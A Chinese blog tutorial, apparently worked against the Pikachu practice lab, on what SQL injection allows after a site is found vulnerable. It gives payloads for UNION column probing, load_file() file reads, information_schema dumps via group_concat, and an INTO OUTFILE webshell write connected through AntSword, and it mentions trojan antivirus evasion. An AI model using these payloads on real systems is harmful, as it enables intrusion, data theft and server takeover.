SQL注入漏洞之后渗透 如何利用 利用的点是什么? 一篇文章给你说明白

目录

​编辑

读取服务器敏感文件数据

利用注入点能干什么

读取数据库数据

语句

函数group_concat(arg)

指令:

注意:

木马相关

木马写入【挂马】

语句:

获取后台真实物理路径


读取服务器敏感文件数据

利用注入点能干什么

  • 能读取服务器数据
  • 读取敏感文件
  • 控制服务器
  • 能读写文件 就是Load_file 需要尝试 返回空 返回错误 就不能读写文件了
Select load_file

读取敏感文件 敏感文件目录扫描

select load_file('C:\\phpStudy\\PHPTutorial\\WWW\\pikachu\\xxx.txt')

前面表的列明长度要大于后面的里面长度 前面的和后面的不相等要报错

vince' union select 1,load_file('C:\\phpStudy\\PHPTutorial\\WWW\\pikachu\\xxx.txt')--+

读取数据库数据

  • 使用union联合查询来进行查询
  • 使用union查询的时候需要探测
    • 前面几个字段 order by 查询了几个字段 报错
    • 然后一个个个字段减法操作

语句

vince' order by 1,2,3--+

前提是猜到了前面表的列明的字段长度

' union select user(),version()--+

' union select 1,group_concat(schema_name) from information_schema.schemata+--+

---------------------------------------------------------------------------------

函数group_concat(arg)

  • 函数 group_concat(arg) 可以合并多行的某列(或多列)数据为一行
    • 默认以逗号分隔
    • 以及分组函数和统计函数的组合使用
  • post ' union select 1,group_concat(schema_name) from information_schema.schemata#

指令:

' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273+--+


注意:

  • 你看到我这里的table_name等于了一个16进制数,这里不用16进制也可以
  • 但是一般我们会用16进制,由于我们提交请求数据的时候浏览器会自动帮我们完成url编码操作
  • 以防url编码的时候出什么问题
  • 所以我们需要把users转换为16进制表示,转换方法如下:使用小葵工具、或者burp的转码工具等

木马相关

  1. 通过一个注入点 我们可以控制一个服务器 我们需要借助一个木马程序 getshell

  2. 我们把一些木马程序通过注入点写入到服务器上,进而控制服务器

  3. 盗取信息 不破会信息,运控制类型 等等。

  4. 木马免杀 处理 防止杀毒软件 软件杀掉。

  5. 木马后门 处理

  6. 一句话木马 控制木马程序 getshell 命令终端。

  7. 通过网址可以正常访问


木马写入【挂马】

  1. mysql开启了secure_file_priv = ""

  2. 知道了网站的真实物理路径 【信息收集】。

  3. 物理路径具备写的权限【你需要写入木马程序上目标服务器 提权操作】。

  4. 运维人员部署项目用的什么权限 那么我们侵入后就是什么权限,所有这也是对运维人员有所要求。

  5. 最好是myesl的root用户 这个条件不是必须的 前面三个条件满足就可以了。

语句:

  Sql注入getshell

  数据库写入文件

  select 123 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\pikachu\\222.txt";

  通过浏览器注入 或者 BP注入
vince' union select "",2 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\pikachu\\hao.php"+--+

  通过蚁剑连接

  获取getshell成功

获取后台真实物理路径

  • 获取真实物理路径有一定难度 这个具体漏洞

喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。

你可能感兴趣的:(SQL注入漏洞,sql,web安全,数据库,网络安全,网络攻击模型,安全架构)